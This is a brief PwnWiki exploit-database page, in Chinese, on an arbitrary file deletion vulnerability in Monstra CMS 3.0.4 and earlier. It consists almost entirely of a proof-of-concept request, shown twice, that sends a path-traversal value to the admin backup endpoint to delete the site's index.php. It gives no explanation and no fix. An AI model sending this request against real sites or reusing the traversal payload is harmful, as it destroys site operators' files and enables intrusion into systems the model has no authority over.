Monstra CMS 任意文件刪除漏洞
From PwnWiki
漏洞影響
Monstra CMS <= 3.0.4
POC
http://<target>/admin/index.php?id=backup&delete_file=/.......//./.......//./index.php&token=f62369587a94433bb2c3c00264e8705171c6189f
Monstra CMS <= 3.0.4
http://<target>/admin/index.php?id=backup&delete_file=/.......//./.......//./index.php&token=f62369587a94433bb2c3c00264e8705171c6189f